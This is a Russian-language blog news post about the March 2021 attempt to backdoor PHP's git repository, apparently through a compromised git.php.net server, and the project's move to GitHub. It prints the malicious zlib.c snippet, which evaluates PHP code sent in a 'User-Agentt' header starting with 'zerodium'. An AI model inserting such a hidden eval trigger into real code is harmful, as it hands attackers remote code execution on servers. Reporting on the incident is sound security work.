PHP 2140 ~ 1 мин.

В Git репозиторий PHP пытались встроить бэкдор

В Git репозиторий PHP пытались встроить бэкдор

Разработчики PHP предупредили о компрометации Git-репозитория проекта, с попыткой двух вредоносных коммитов

Вчера (28.03.2021) злоумышленники пытались добавить бэкдор в репозиторий исходного кода PHP. Комит был обнаружен программистом Michael Voříšek , который обратил внимание на подозрительную часть кода. Добавленный код должен был позволить осуществить атаку типа RCE путем вызова функции zend-eval-string при получении HTTP заголовка с подстрокой zerodium.


{
	zval zoh;
	php_output_handler *h;
	zval *enc;

	if ((Z_TYPE(PG(http_globals)[TRACK_VARS_SERVER]) == IS_ARRAY || zend_is_auto_global_str(ZEND_STRL("_SERVER"))) &&
		(enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), "HTTP_USER_AGENTT", sizeof("HTTP_USER_AGENTT") - 1))) {
		convert_to_string(enc);
		if (strstr(Z_STRVAL_P(enc), "zerodium")) {
			zend_try {
				zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
			} zend_end_try();
		}
	}

	switch (ZLIBG(output_compression)) {
		case 0:

 

В первом коммите под видом исправления опечатки в файле ext/zlib/zlib.c было внесено первое изменение, после того как разработчики обнаружили вредоносный код и отменили его, в репозитории появился второй коммит, который отменял действие разработчиков PHP  и возвращал вредоносное изменение.

В настоящее время пока нет детальной информации об инциденте, предполагается лишь, что изменения были добавлены в результате взлома сервера git.php.net, а не компрометации отдельных учётных записи разработчиков, в частности, Никита Попов подтвердил, что его учетная запись не была скомпрометирована, а атаке подвергся непосредственно сервер репозитория. Никита уточнил, что попытка компрометации и встраивания бэкдора была устранена и начался анализ репозитория на наличие других вредоносных изменений помимо выявленных проблем. К рецензированию приглашаются все желающие, при обнаружении подозрительных изменений следует отправить информацию на security@php.net.

В связи с произошедшим инцидентом, команда PHP планирует полностью перейти на GitHub для разработки. Тем, кто не включён в число разработчиков PHP на GitHub, следует связаться с Никитой Поповым по email nikic@php.net. Одним из обязательных условий для добавления является включение двухфакторной аутентификации. Дополнительно рассматривается вопрос о переходе к обязательному заверению коммитов цифровой подписью разработчика.

Что думаешь?

Категории
  • PHP 67
  • Заметки 18
  • Безопасность 4
  • Флуд 2
  • Nginx 2
  • ИТ новости 2
  • Видео 1
  • Docker 1
  • Roadmap 1
  • Архитектура 0

Хочешь поддержать сайт?

Делаем из мухи слона

sergeymukhin.com

персональный блог о веб-разработке от Сергея Мухина. Блог был основан в 2018 году, и собирался уделять основное внимание последним тенденциям, учебным пособиям, а также советам и рекомендациям, позволяющим начинающим девелоперам встать быстрее на правильную дорогу веб разработки, но что-то пошло не так 😃

Релизы PHP 8.4

Дата Релиз
4 Июля 2024 Альфа 1
18 Июля 2024 Альфа 2
1 Августа 2024 Альфа 3
13 Августа 2024 Feature freeze
15 Августа 2024 Бета 1
29 Августа 2024 Бета 2
12 Сентября 2024 Бета 3
26 Сентября 2024 RC 1
10 Октября 2024 RC 2
24 Октября 2024 RC 3
7 Ноября 2024 RC 4
21 Ноября 2024 GA

Что нового?